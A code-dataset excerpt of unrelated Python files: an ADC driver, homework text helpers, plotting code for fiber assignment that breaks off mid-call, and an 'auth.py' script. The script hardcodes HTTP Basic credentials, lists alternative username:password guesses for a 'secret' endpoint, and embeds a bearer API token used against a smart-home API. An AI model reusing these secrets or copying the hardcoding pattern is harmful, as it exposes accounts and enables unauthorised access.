Returns:\n rd_data, list.\n\n Examples:\n mixads8568sg.read_all_ch_data()\n\n '''\n ch_a_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_A_DATA, MIXADS8568SGDef.DATA_LEN)\n ch_b_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_B_DATA, MIXADS8568SGDef.DATA_LEN)\n ch_c_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_C_DATA, MIXADS8568SGDef.DATA_LEN)\n ch_d_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_D_DATA, MIXADS8568SGDef.DATA_LEN)\n return ch_a_data[0] + ch_b_data[0] + ch_c_data[0] + ch_d_data[0]\n\n def sel_mode(self, dev_func_mode='hw'):\n '''\n MIXADS8568SG select device functional mode.\n\n Args:\n dev_func_mode: string, ['sw', 'hw'], device functional mode.\n\n Examples:\n mixads8568sg.sel_mode('hw')\n\n '''\n assert dev_func_mode in MIXADS8568SGDef.DEV_FUNC_MODE\n\n self.hw_sw_sel.set_level(MIXADS8568SGDef.DEV_FUNC_MODE[dev_func_mode])\n\n def init_pins(self):\n '''\n MIXADS8568SG init pins.\n\n Examples:\n mixads8568sg.init_pins()\n\n '''\n self.convst_a.set_dir('output')\n self.convst_b.set_dir('output')\n self.convst_c.set_dir('output')\n self.convst_d.set_dir('output')\n self.xclk.set_dir('output')\n self.hw_sw_sel.set_dir('output')\n self.ref_sel.set_dir('output')\n self.stby.set_dir('output')\n self.reset.set_dir('output')\n self.cs.set_dir('output')\n self.refbuf_en.set_dir('output')\n self.asleep_sel.set_dir('output')\n self.ser_sel.set_dir('output')\n self.sel_cd.set_dir('output')\n self.sel_b.set_dir('output')\n self.busy.set_dir('input')\n\n def reset_dev(self):\n '''\n MIXADS8568SG reset, active high. This pin aborts any ongoing conversions and resets the internal\n configuration register(CONFIG) to 000003FFh.A valid reset pulse must be at least 50 ns long.\n\n Examples:\n mixads8568sg.reset_dev()\n\n '''\n self.reset.set_level(0)\n time.sleep(0.001)\n self.reset.set_level(1)\n time.sleep(0.001)\n self.reset.set_level(0)\n\n def init_dev(self, dev_func_mode):\n '''\n MIXADS8568SG init device.\n\n Args:\n dev_func_mode: string, ['sw', 'hw'], device functional mode.\n\n Examples:\n mixads8568sg.init_dev()\n\n '''\n assert dev_func_mode in MIXADS8568SGDef.DEV_FUNC_MODE\n\n self.sel_mode(dev_func_mode)\n self.init_pins()\n self.reset_dev()\n # Enable FPGA IP.\n self.ctrl_dev('enable')\n\n def sel_max_vref_output_range(self, max_vref_range=2.5):\n '''\n MIXADS8568SG set maximum reference voltage output range.\n\n Args:\n max_vref_range: int, [2.5, 3]V, maximum reference voltage output range.\n\n Examples:\n mixads8568sg.sel_max_vref_output_range(3)\n\n '''\n assert max_vref_range in MIXADS8568SGDef.MAX_VREF_OUTPUT_RANGE\n\n range_mask = MIXADS8568SGDef.MAX_VREF_OUTPUT_RANGE[max_vref_range]\n rd_data = self.read_config_register()\n wr_data = rd_data | range_mask\n self.write_config_register(wr_data)\n self.max_vref_range = max_vref_range\n\n def set_absolute_volt_range(self, dev_func_mode, vrange, ch_pair='A'):\n '''\n MIXADS8568SG set absolute volt range.\n\n Args:\n dev_func_mode: string, ['sw', 'hw'], device function mode.\n vrange: string, ['4VREF', '2VREF'], volt range.\n ch_pair: string, ['A', 'B', 'C', 'D'], channel pair.\n\n Examples:\n mixads8568sg.set_absolute_volt_range('hw', '2VREF')\n\n '''\n assert dev_func_mode in MIXADS8568SGDef.DEV_FUNC_MODE\n assert vrange in MIXADS8568SGDef.HW_ABSOLUTE_VOLT_RANGE\n assert ch_pair in MIXADS8568SGDef.SW_ABSOLUTE_VOLT_RANGE\n\n self.input_volt_range = 4 * self.max_vref_range if '4VREF' == vrange else 2 * self.max_vref_range\n if 'hw' == dev_func_mode:\n self.xclk.set_level(MIXADS8568SGDef.HW_ABSOLUTE_VOLT_RANGE[vrange])\n else:\n rd_data = self.read_config_register()\n wr_data = rd_data | MIXADS8568SGDef.SW_ABSOLUTE_VOLT_RANGE[ch_pair][vrange]\n self.write_config_register(wr_data)\n\n def set_inter_vref(self, dev_func_mode, internal_ref_volt):\n '''\n MIXADS8568SG set internal reference voltage.\n\n Args:\n dev_func_mode: string, ['sw', 'hw'], device function mode.\n internal_ref_volt: float, [0.5V~3.0] unit V, internal reference voltage.\n\n Examples:\n mixads8568sg.set_internal_ref_volt(3.0)\n\n '''\n assert dev_func_mode in MIXADS8568SGDef.DEV_FUNC_MODE\n assert 0.5 <= internal_ref_volt <= 3.0\n\n code = (1024 * internal_ref_volt) / self.max_vref_range - 1\n rd_data = self.read_config_register()\n wr_data = rd_data | code\n self.write_config_register(wr_data)\n\n if 'hw' == dev_func_mode:\n # Internal reference enable in hw mode.\n self.ref_sel.set_level(1)\n else:\n # Internal reference enable in sw mode.\n wr_data |= MIXADS8568SGDef.INTERNAL_VREF_EN\n self.write_config_register(wr_data)\n\n def start_conv(self, ch_pair):\n '''\n MIXADS8568SG start converting, active high.\n\n Args:\n ch_pair: string, ['A', 'B', 'C', 'D'], channel pair.\n\n Examples:\n ads8568.start_conv('A')\n\n '''\n channel = {'A': self.convst_a, 'B': self.convst_b,\n 'C': self.convst_c, 'D': self.convst_d}\n assert ch_pair in channel\n\n channel[ch_pair].set_level(0)\n time.sleep(0.001)\n channel[ch_pair].set_level(1)\n time.sleep(0.001)\n channel[ch_pair].set_level(0)\n\n def _code_2_mvolt(self, code):\n '''\n MIXADS8568SG translate the code value to voltage value.\n\n Args:\n code: int, code value.\n\n Examples:\n ads8568._code_2_mvolt(0x1234)\n\n '''\n # assert 0 <= code <= 0xFFFF\n\n # When Singular channel number.\n # if (0 <= code <= 0x7FFF):\n # volt0 = (((code >> 16) & 0x0000FFFF) / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n # # When dual channel number\n # volt1 = (code & 0x0000FFFF) * MIXADS8568SGDef.POSITIVE_FULL_SCALE * self.input_volt_range\n # elif (0x8000 <= code <= 0xFFFF):\n # volt0 = -(((code >> 16) & 0x0000FFFF) / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n # # When dual channel number\n # volt1 = -(code & 0x0000FFFF) * MIXADS8568SGDef.POSITIVE_FULL_SCALE * self.input_volt_range\n assert 0 <= code <= 0xFFFFFFFF\n\n code0 = (((code >> 16) & 0x0000FFFF))\n code1 = (code & 0x0000FFFF)\n if (0 <= code0 <= 0x7FFF):\n volt0 = (code0 / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n elif (0x8000 <= code0 <= 0xFFFF):\n volt0 = -(code0 / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n\n if (0 <= code1 <= 0x7FFF):\n volt1 = (code1 / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n elif (0x8000 <= code1 <= 0xFFFF):\n volt1 = -(code1 / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n\n return [volt0, volt1]\n\n # def ads8568_read_ch(self, ch, range, mode, polarity):\n\n def read_ch(self, ch):\n '''\n MIXADS8568SG read single channel.\n\n Args:\n ch: int, [1~8], channel.\n\n Returns:\n volt, float, volt value.\n\n Examples:\n ads8568.read_ch(2)\n '''\n assert ch in MIXADS8568SGDef.CHANNEL\n\n # Channel one-to-one correspondence.\n self.sel_cd.set_level(1)\n self.sel_cd_ch('enable')\n self.sel_b.set_level(1)\n self.sel_b_ch('enable')\n\n # Conversion start\n self.start_conv(MIXADS8568SGDef.CHANNEL[ch])\n time.sleep(0.001)\n while self.busy.get_level():\n pass\n self.adc_ch_pair_en(1)\n # Get volt.\n # Call spi bus read api with corresponding pin.\n code = self.read_single_ch_data(MIXADS8568SGDef.CHANNEL[ch])\n rd_data = self._code_2_mvolt(code)\n volt = rd_data[0] if (ch % 2) != 0 else rd_data[1]\n\n return volt\n\n def scan_ch(self, ch_list):\n '''\n MIXADS8568SG read multiple channel.\n\n Args:\n ch_list: list, [1~8], list of channel.\n\n Returns:\n volt, list, volt value.\n\n Examples:\n ads8568.scan_ch([1, 2 ,5, 8])\n '''\n assert isinstance(ch_list, list)\n for x in range(len(ch_list)):\n assert ch_list[x] in MIXADS8568SGDef.CHANNEL\n\n # Channel one-to-one correspondence.\n self.sel_cd.set_level(1)\n self.sel_cd_ch('enable')\n self.sel_b.set_level(1)\n self.sel_b_ch('enable')\n\n tmp = []\n # A conversion start must not be issued during an ongoing conversion on the corresponding channel pair.\n # Get whole channel pair.\n for i in range(len(ch_list)):\n tmp.append(MIXADS8568SGDef.CHANNEL[ch_list[i]])\n # Remove duplicate channel pair.\n ch_pair = set(tmp)\n for ch in ch_pair:\n self.start_conv(ch)\n # self.start_conv(MIXADS8568SGDef.CHANNEL[ch])\n time.sleep(0.001)\n # Wait for conversion.\n while self.busy.get_level():\n pass\n self.adc_ch_pair_en(4)\n # Get volt.\n result_list = []\n for i in range(len(ch_list)):\n code = self.read_single_ch_data(ch_list[i])\n rd_data = self._code_2_mvolt(code)\n if 'A' == MIXADS8568SGDef.CHANNEL[ch_list[i]]:\n if 1 == ch_list[i]:\n volt_ch1 = rd_data[0]\n result_list.append(volt_ch1)\n elif 2 == ch_list[i]:\n volt_ch2 = rd_data[1]\n result_list.append(volt_ch2)\n elif 'B' == MIXADS8568SGDef.CHANNEL[ch_list[i]]:\n if 3 == ch_list[i]:\n volt_ch3 = rd_data[0]\n result_list.append(volt_ch3)\n elif 4 == ch_list[i]:\n volt_ch4 = rd_data[0]\n result_list.append(volt_ch4)\n elif 'C' == MIXADS8568SGDef.CHANNEL[ch_list[i]]:\n if 5 == ch_list[i]:\n volt_ch5 = rd_data[0]\n result_list.append(volt_ch5)\n elif 6 == ch_list[i]:\n volt_ch6 = rd_data[0]\n result_list.append(volt_ch6)\n elif 'D' == MIXADS8568SGDef.CHANNEL[ch_list[i]]:\n if 7 == ch_list[i]:\n volt_ch7 = rd_data[0]\n result_list.append(volt_ch7)\n elif 8 == ch_list[i]:\n volt_ch8 = rd_data[0]\n result_list.append(volt_ch8)\n\n return result_list\n","sub_path":"mix_ads8568_sg.py","file_name":"mix_ads8568_sg.py","file_ext":"py","file_size_in_byte":17888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"591747908","text":"import json\nimport requests\nimport base64\n\nfrom django.core.mail import send_mail\n\nheaders = {'Authorization': 'Basic YWxsYWRpbjpvcGVuc2VzYW1l'}\nresponse = requests.post('http://79.137.175.13/submissions/1/', headers=headers)\n\npwd = base64.b64encode(b'galchonok:ktotama')\nheaders = {'Authorization': f'Basic {pwd.decode()}'}\n#funny:world\n#admin:world\n#response = requests.put('http://79.137.175.13/submissions/super/duper/secret/', headers=headers)\n#print(json.loads(response.content.decode('utf-8')))\n\n#curl -v -H \"Content-Type: application/json\" \"Authorization: Basic asdafasfasf\" -X POST -d '{\"title\":\"Сыр российский\", \"description\":\"очень вкусный сыр\", \"price\":\"1tp://127.0.0.1:8000/api/v1/goods/\n\n#headers = {'Content-Type': 'application/json', 'Authorization': 'Basic YWxsYWRpbjpvcGVuc2VzYW1l'}\n\n#pwd = base64.b64encode(b'funny:world')\n#headers = {'Content-Type': 'application/json', 'Content-Encoding': 'utf-8','Authorization': 'Basic {}'.format(pwd.decode())}\n#params = {\"title\": \"asdasd\", \"description\":\"asdasd\",\"price\":\"10\"}\n#response = requests.post('http://127.0.0.1:8000/api/v1/goods/', data = json.dumps(params), headers=headers)\n\n#key = base64.b64decode(pwd)\n#print(response)\n\nTOKEN_API = 'f60671e7408e521407d3545f6a35948afbf135fa54bf580ff66159f3bee81a4d'\nheaders = {'Content-Type': 'application/json', 'Content-Encoding': 'utf-8','Authorization': f'Bearer {TOKEN_API}'}\n\n#response = requests.get('http://smarthome.t3st.ru/api/auth.current', headers=headers)\n#print(response.json())\n\n#response = requests.get('http://smarthome.t3st.ru/api/user.controller', headers=headers)\n\n#data = response.json()\n\ndef send_email():\n send_mail(\n 'Smart house. Alert',\n 'Ahtung! There is a problem in you flat',\n 'pvv@mail.ru',\n ['pvv@mail.ru'],\n fail_silently=False,\n )\nclass controller():\n def __init__(self, name, value):\n self = {\"name\":name,\"value\":value }\n\n def get(self):\n return self\n\nparams = {}\nparams[\"controllers\"] = []\n\nparams[\"controllers\"].append({\"name\":\"air_conditioner\", \"value\":\"true\"})\nparams[\"controllers\"].append({\"name\":\"leak_detector\", \"value\":\"true\"})\n\n#response = requests.post('http://smarthome.t3st.ru/api/user.controller', data = json.dumps(params), headers=headers)\n\nprint(send_email)\n#print(response.text)\n","sub_path":"auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"69822829","text":"import string\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef get_h1_tag(html):\n '''\n This function takes as input a string containing html.\n It searches the html for the h1 tag,\n and returns the contents of the h1 tag.\n HINT: Use BeautifulSoup\n >>> get_h1_tag('

example

')\n 'example'\n >>> get_h1_tag('

example

')\n 'example'\n '''\n bs=BeautifulSoup(html, \"html.parser\")\n return bs.find('h1').text\n \n\ndef download_html(url):\n '''\n This function takes a url as input and returns the html associated with\n the url.\n WARNING:\n The doctests for this function rely on both the download_html and get_h1_tag\n functions.\n Therefore, these doctests cannot pass until both functions are correctly\n implemented.\n Ideally, we would never have the doctests of a function depend on other\n functions also working correctly,\n but for some functions that have particularly complicated output,\n this is unavoidable.\n HINT: use the requests library to implement this function\n >>> get_h1_tag(download_html('https://en.wikipedia.org/wiki/Laika'))\n 'Laika'\n '''\n webpage = requests.get('https://en.wikipedia.org/wiki/Laika').text\n return webpage\n\ndef get_p_contents(html):\n r'''\n This function takes as input a string containing html. \n It searches the html for all p tags,\n and returns the contents of all p tags concatenated into a single string.\n The newline character should be placed between the contents of all p tags.\n HINT: use BeautifulSoup\n >>> get_p_contents('

example

')\n 'example'\n >>> get_p_contents('

example

')\n 'example'\n >>> get_p_contents('

example

blah blah blah

example

')\n 'example\\nexample'\n '''\n bs=BeautifulSoup(html)\n contents = ''\n for a in bs.find_all('p'):\n contents += a.text\n contents += '\\n'\n edited = contents[0:(len(contents)-1)]\n return edited\n\n\ndef remove_punctuation(text):\n '''\n This function takes as input text and returns a modified version of the string \n with all punctuation characters removed.\n >>> remove_punctuation('U.S.A.')\n 'USA'\n >>> remove_punctuation('My advice: (1) get bigger; (2) get badder; (3) get ugly!')\n 'My advice 1 get bigger 2 get badder 3 get ugly'\n >>> remove_punctuation(string.punctuation)\n ''\n '''\n import string\n table = str.maketrans(dict.fromkeys(string.punctuation))\n new_s = text.translate(table)\n return new_s\n\ndef remove_numbers(text):\n from string import digits\n '''\n This function takes as input text and returns a modified version of the string \n with all numbers removed.\n The function only removes arabic numerals, and does not remove spelled-out numbers.\n >>> remove_numbers('1234567890')\n ''\n >>> remove_numbers('one')\n 'one'\n >>> remove_numbers('MMXIX')\n 'MMXIX'\n >>> remove_numbers('p4ssw0rd')\n 'psswrd'\n '''\n final = ''.join([i for i in text if not i.isdigit()])\n return final\n\ndef remove_newlines(text):\n r'''\n This function takes as input text and returns a modified version of the string \n with all newline characters '\\n' replaced with a space ' '.\n >>> remove_newlines('this\\nis\\na\\ntest')\n 'this is a test'\n '''\n text = text.replace('\\n',' ')\n return text\n\nstop_words=['','i','me','my','myself','we','our','ours','ourselves','you','your','yours','yourself','yourselves','he','him','his','himself','she','her','hers','herself','it','its','itself','they','them','their','theirs','themselves','what','which','who','whom','this','that','these','those','am','is','are','was','were','be','been','being','have','has','had','having','do','does','did','doing','a','an','the','and','but','if','or','because','as','until','while','of','at','by','for','with','about','against','between','into','through','during','before','after','above','below','to','from','up','down','in','out','on','off','over','under','again','further','then','once','here','there','when','where','why','how','all','any','both','each','few','more','most','other','some','such','no','nor','not','only','own','same','so','than','too','very','s','t','can','will','just','don','should','now','could','would','how','many']\n\ndef remove_stop_words(text):\n '''\n This function takes as input text and returns a modified version of the string \n with all stop words removed.\n Stop words are simple English words that appear very often in text no matter\n what the subject is,\n and so they would look like noise in our analysis.\n >>> remove_stop_words('How much wood would a woodchuck chuck if a woodchuck could chuck wood?')\n 'much wood woodchuck chuck woodchuck chuck wood?'\n >>> remove_stop_words('If Peter Piper picked a peck of pickled peppers, how many pickled peppers did Peter Piper pick?')\n 'Peter Piper picked peck pickled peppers, pickled peppers Peter Piper pick?'\n '''\n words = text.split()\n result = ''\n i=0\n while i < len(words):\n if words[i].lower() not in stop_words:\n if i == (len(words) - 1):\n result += words[i]\n else:\n result += (words[i] + ' ')\n i += 1\n return result\n\ndef count_words(text):\n '''\n This function takes as input a string and returns a dictionary.\n The keys in the dictionary are the words in the input,\n and the values are the number of times the word appeared in the input.\n All keys are stored in lower case, \n and the case of the words in the original text is ignored.\n WARNING: \n Functions that output dictionaries need to be wrapped within the built-in\n pprint function for the doctests to work.\n This is because be default, python prints dictionaries in a\n non-deterministic ordering,\n but pprint ensures that the order is sorted alphabetically.\n For details, see https://stackoverflow.com/questions/15549429/how-do-i-test-dictionary-equality-with-pythons-doctest-package\n >>> pprint(count_words('a a B B B B c C a A a A ddDdd'))\n {'a': 6, 'b': 4, 'c': 2, 'ddddd': 1}\n '''\n import pprint\n lst = text.lower().split()\n compare = text.lower().split()\n results = {}\n i=0\n while i < len(lst):\n if lst[i] in compare:\n results[lst[i]] = results.get(lst[i], 0) + 1\n i += 1\n return results\n\ndef get_top_k_words(counts_dict,k):\n '''\n The counts_dict variable is a dictionary whose values are integers,\n and the k variable is an integer.\n The return value is another dictionary whose entries are the k entries\n of counts_dict with the largest values.\n HINT:\n Python has a built in function called nlargest within the heapq module.\n This function takes as input a list and returns the nth-largest value of the list.\n You can find detailed documentation at https://docs.python.org/2/library/heapq.html\n You can implement get_top_k_words by:\n Step 1: use heapq.nlargest to find the k-th largest value within counts_dict\n Step 2: remove all values in counts_dict less than the value from step 1\n WARNING:\n See the warning for count_words\n >>> pprint(get_top_k_words({'b': 4, 'c': 2, 'a': 6, 'ddddd': 1}, 1))\n {'a': 6}\n >>> pprint(get_top_k_words({'b': 4, 'c': 2, 'a': 6, 'ddddd': 1}, 2))\n {'a': 6, 'b': 4}\n >>> pprint(get_top_k_words({'b': 4, 'c': 2, 'a': 6, 'ddddd': 1}, 10))\n {'a': 6, 'b': 4, 'c': 2, 'ddddd': 1}\n '''\n import heapq\n heap = [(value, key) for key,value in counts_dict.items()]\n largest = dict(heapq.nlargest(k, heap))\n final_s = {v: x for x, v in largest.items()}\n return final_s\n\ndef print_dictionary(d):\n '''\n This function prints the keys and values of the dictionary with each key on its own line.\n EXTRA CREDIT:\n You can receive up to 5 points of extra credit on this problem by completing two tasks:\n First, print the keys sorted by value from highest to lowest.\n Second, ensure that all of the printed values are horizontally aligned.\n For example, the output like the following would earn the extra credit:\n laika : 33\n space : 21\n soviet : 19\n dogs : 16\n dog : 12\n sputnik : 12\n Output like the following is also acceptable for full credit, but would not earn extra credit:\n sputnik : 12\n space : 21\n dog : 12\n soviet : 19\n laika : 33\n dogs : 16\n '''\n import operator\n keys = list(d.keys())\n longest = ''\n for elem in keys:\n if len(elem) > len(longest):\n longest = elem\n j = 0\n sort = sorted(d.items())\n while j < len(sort):\n x = (len(longest) - len(sort[j][0]))\n print(sort[j][0], ' ' * x, ': ', sort[j][1])\n j += 1\n\n\n####################################TESTS########################################\nif __name__=='__main__':\n from pprint import pprint\n import doctest\n doctest.testmod(verbose=True)\n","sub_path":"Hws/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90490189","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n# -*- coding: utf-8 -*-\n\"\"\"\nfiberassign.vis\n=======================\n\nVisualization tools.\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport os\nimport warnings\n\nimport numpy as np\n\nimport multiprocessing as mp\nfrom functools import partial\n\nimport fitsio\n\nfrom ._internal import Shape\n\nfrom .utils import Logger, default_mp_proc\n\nfrom .hardware import load_hardware, FIBER_STATE_STUCK, FIBER_STATE_BROKEN\n\nfrom .tiles import load_tiles\n\nfrom .targets import (Targets, load_target_table,\n TARGET_TYPE_SCIENCE, TARGET_TYPE_SKY,\n TARGET_TYPE_SUPPSKY,\n TARGET_TYPE_STANDARD, TARGET_TYPE_SAFE)\n\nfrom .assign import (read_assignment_fits_tile, result_tiles, result_path,\n avail_table_to_dict)\n\nplt = None\n\ndef set_matplotlib_pdf_backend():\n \"\"\"Set the matplotlib backend to PDF.\n\n This is necessary to render high resolution figures.\n \"\"\"\n global plt\n if plt is not None:\n return\n try:\n import matplotlib\n matplotlib.use(\"pdf\")\n import matplotlib.pyplot as plt\n except ValueError:\n warnings.warn(\n \"\"\"Couldn't set the PDF matplotlib backend,\npositioner plots may be low resolution.\nProceeding with the default matplotlib backend.\"\"\"\n )\n import matplotlib.pyplot as plt\n\n\ndef plot_target_type_color(tgtype):\n color = \"gray\"\n tp = int(tgtype)\n if (tp & TARGET_TYPE_SAFE) != 0:\n color = \"black\"\n elif (tp & TARGET_TYPE_SKY) != 0:\n color = \"blue\"\n elif (tp & TARGET_TYPE_SUPPSKY) != 0:\n color = \"cyan\"\n elif (tp & TARGET_TYPE_STANDARD) != 0:\n color = \"gold\"\n if (tp & TARGET_TYPE_SCIENCE) != 0:\n color = \"green\"\n elif (tp & TARGET_TYPE_SCIENCE) != 0:\n color = \"red\"\n return color\n\n\ndef plot_positioner(ax, patrol_rad, loc, center, shptheta, shpphi, color=\"k\",\n linewidth=0.2):\n \"\"\"Plot one fiber positioner.\n \"\"\"\n set_matplotlib_pdf_backend()\n patrol = plt.Circle((center[0], center[1]), radius=patrol_rad, fc=color,\n ec=\"none\", alpha=0.1)\n ax.add_artist(patrol)\n # Plot the arm from the center to the body\n thetacent = shptheta.axis\n armwidth = 0.25\n armlen = np.sqrt((thetacent[1] - center[1])**2\n + (thetacent[0] - center[0])**2)\n armang = np.arctan2(thetacent[1] - center[1], thetacent[0] - center[0])\n sinarm = np.sin(armang)\n cosarm = np.cos(armang)\n arm_xoff = center[0] + (0.5*armwidth) * sinarm\n arm_yoff = center[1] - (0.5*armwidth) * cosarm\n armang_deg = armang * 180.0 / np.pi\n arm = plt.Rectangle((arm_xoff, arm_yoff), armlen, armwidth,\n angle=armang_deg, color=color, linewidth=2*linewidth,\n fill=False)\n ax.add_artist(arm)\n for piece in [shptheta, shpphi]:\n for circle in piece.circles:\n xcent, ycent = circle.center\n rad = circle.radius\n circ = plt.Circle((xcent, ycent), radius=rad, fc=\"none\", ec=color,\n linewidth=linewidth)\n ax.add_artist(circ)\n for segs in piece.segments:\n xpts = np.array([p[0] for p in segs.points])\n ypts = np.array([p[1] for p in segs.points])\n ax.plot(xpts, ypts, linewidth=linewidth, color=color)\n fontpix = armwidth * 2\n fontpt = int(0.25 * fontpix)\n fontpt = 2.0\n xtxt = center[0] - 2 * armwidth * cosarm\n ytxt = center[1] - 2 * armwidth * sinarm\n ax.text(xtxt, ytxt, \"{}\".format(loc),\n color='k', fontsize=fontpt,\n horizontalalignment='center',\n verticalalignment='center',\n bbox=None)\n # bbox=dict(fc='w', ec='none', pad=1, alpha=1.0))\n return\n\n\ndef plot_positioner_simple(ax, patrol_rad, loc, center, theta_ang, theta_arm,\n phi_ang, phi_arm, color=\"k\", linewidth=0.2):\n \"\"\"Plot one fiber positioner.\n\n This uses a simpler representation of the positioner geometry, in order to\n speed up the plotting.\n\n \"\"\"\n set_matplotlib_pdf_backend()\n patrol = plt.Circle((center[0], center[1]), radius=patrol_rad, fc=color,\n ec=\"none\", alpha=0.1)\n ax.add_artist(patrol)\n\n # Plot the arm from the center to the phi body\n theta_x = theta_arm * np.cos(theta_ang) + center[0]\n theta_y = theta_arm * np.sin(theta_ang) + center[1]\n\n ax.plot([center[0], theta_x], [center[1], theta_y], color=color,\n linewidth=5*linewidth)\n\n # Plot the phi arm.\n phi_x = phi_arm * np.cos(phi_ang + theta_ang) + theta_x\n phi_y = phi_arm * np.sin(phi_ang + theta_ang) + theta_y\n\n ax.plot([theta_x, phi_x], [theta_y, phi_y], color=color,\n linewidth=linewidth)\n\n fontpt = 2.0\n xtxt = center[0]\n ytxt = center[1] + 0.5\n ax.text(xtxt, ytxt, \"{}\".format(loc),\n color='k', fontsize=fontpt,\n horizontalalignment='center',\n verticalalignment='center',\n bbox=None)\n return\n\n\ndef plot_tile_targets_props(hw, tile_ra, tile_dec, tile_theta, tgs,\n avail_tgid=None):\n if avail_tgid is None:\n avail_tgid = tgs.ids()\n ra = np.full(len(avail_tgid), 9999.9, dtype=np.float64)\n dec = np.full(len(avail_tgid), 9999.9, dtype=np.float64)\n color = list()\n for idx, tgid in enumerate(avail_tgid):\n tg = tgs.get(tgid)\n ra[idx] = tg.ra\n dec[idx] = tg.dec\n color.append(plot_target_type_color(tg.type))\n # We disable threading here, since it does not interact well with\n # multiprocessing.\n\n tgxy = hw.radec2xy_multi(tile_ra, tile_dec, tile_theta, ra, dec, False, 1)\n props = {tgid: {\"xy\": xy, \"color\": cl} for tgid, xy, cl\n in zip(avail_tgid, tgxy, color)}\n\n return props\n\n\ndef plot_available(ax, targetprops, selected, linewidth=0.1):\n mwidth = 5.0 * linewidth\n xdata = np.full(len(selected), 9999.9, dtype=np.float64)\n ydata = np.full(len(selected), 9999.9, dtype=np.float64)\n color = list()\n for idx, tgid in enumerate(selected):\n xdata[idx] = targetprops[tgid][\"xy\"][0]\n ydata[idx] = targetprops[tgid][\"xy\"][1]\n color.append(targetprops[tgid][\"color\"])\n ax.scatter(xdata, ydata, color=color, marker=\".\",\n linewidth=linewidth, s=mwidth)\n return\n\n\ndef plot_assignment(ax, hw, targetprops, tile_assigned, linewidth=0.1,\n real_shapes=False):\n log = Logger.get()\n center_mm = hw.loc_pos_curved_mm\n theta_arm = hw.loc_theta_arm\n phi_arm = hw.loc_phi_arm\n theta_offset = hw.loc_theta_offset\n theta_min = hw.loc_theta_min\n theta_max = hw.loc_theta_max\n theta_pos = hw.loc_theta_pos\n phi_offset = hw.loc_phi_offset\n phi_min = hw.loc_phi_min\n phi_max = hw.loc_phi_max\n phi_pos = hw.loc_phi_pos\n state = hw.state\n loc_petal = dict(hw.loc_petal)\n device_type = dict(hw.loc_device_type)\n assigned = np.array(sorted(tile_assigned.keys()), dtype=np.int32)\n\n # Plot GFA / Petal edges. Only plot one shape per petal, although\n # the code formally allows unique petal / GFA boundaries per device.\n\n if len(assigned) > 0:\n edge_gfa = dict()\n edge_petal = dict()\n for loc in assigned:\n pt = loc_petal[loc]\n if pt not in edge_gfa:\n edge_gfa[pt] = hw.loc_gfa_excl[loc]\n edge_petal[pt] = hw.loc_petal_excl[loc]\n for pt, shp in edge_gfa.items():\n for segs in shp.segments:\n xpts = np.array([p[0] for p in segs.points])\n ypts = np.array([p[1] for p in segs.points])\n ax.plot(xpts, ypts, linewidth=0.2*linewidth, color=\"gray\")\n for pt, shp in edge_petal.items():\n for segs in shp.segments:\n xpts = np.array([p[0] for p in segs.points])\n ypts = np.array([p[1] for p in segs.points])\n ax.plot(xpts, ypts, linewidth=0.2*linewidth, color=\"gray\")\n\n for lid in assigned:\n color = \"gray\"\n if (device_type[lid] != \"POS\") and (device_type[lid] != \"ETC\"):\n continue\n shptheta = Shape()\n shpphi = Shape()\n theta = None\n phi = None\n center = center_mm[lid]\n tgid = tile_assigned[lid]\n patrol_rad = theta_arm[lid] + phi_arm[lid]\n failed = False\n is_assigned = (tgid >= 0)\n if is_assigned:\n # This fiber is assigned. Plot the positioner located at the\n # assigned target.\n failed = hw.loc_position_xy(lid, targetprops[tgid][\"xy\"],\n shptheta, shpphi)\n if failed:\n msg = \"Positioner at location {} cannot move to target {} at (x, y) = ({}, {}). This should have been dected during assignment!\".format(lid, tgid, targetprops[tgid][\"xy\"][0], targetprops[tgid][\"xy\"][1])\n log.warning(msg)\n raise RuntimeError(msg)\n is_assigned = False\n failed = False\n else:\n color = targetprops[tgid][\"color\"]\n theta, phi = hw.xy_to_thetaphi(\n center, targetprops[tgid][\"xy\"],\n theta_arm[lid], phi_arm[lid],\n theta_offset[lid], phi_offset[lid],\n theta_min[lid], phi_min[lid],\n theta_max[lid], phi_max[lid],\n )\n if not is_assigned:\n # This fiber is unassigned.\n if (state[lid] & FIBER_STATE_STUCK) or (state[lid] & FIBER_STATE_BROKEN):\n # The positioner is stuck or fiber broken. Plot it at its current\n # location.\n theta = theta_pos[lid]\n phi = phi_pos[lid]\n print(\"loc {}, state {} is stuck / broken, using {} / {}\".format(\n lid, state[lid], theta, phi\n ), flush=True)\n failed = hw.loc_position_thetaphi(\n lid, theta_pos[lid], phi_pos[lid], shptheta, shpphi\n )\n else:\n # Plot the positioner in its home\n # position with theta at its minimum value and phi\n # at 180 degrees.\n theta = theta_offset[lid] + theta_min[lid]\n phi = phi_offset[lid] + phi_max[lid]\n if phi > np.pi:\n phi = np.pi\n print(\"loc {}, state {} is unassigned, using {} / {}\".format(\n lid, state[lid], theta, phi\n ), flush=True)\n failed = hw.loc_position_thetaphi(lid, theta, phi, shptheta, shpphi)\n if failed:\n msg = \"Positioner at location {} cannot move to its stuck or home position. This should never happen!\".format(lid)\n log.warning(msg)\n if not failed:\n if real_shapes:\n plot_positioner(\n ax, patrol_rad, lid, center, shptheta, shpphi,\n color=color, linewidth=linewidth\n )\n else:\n plot_positioner_simple(\n ax, patrol_rad, lid, center, theta, 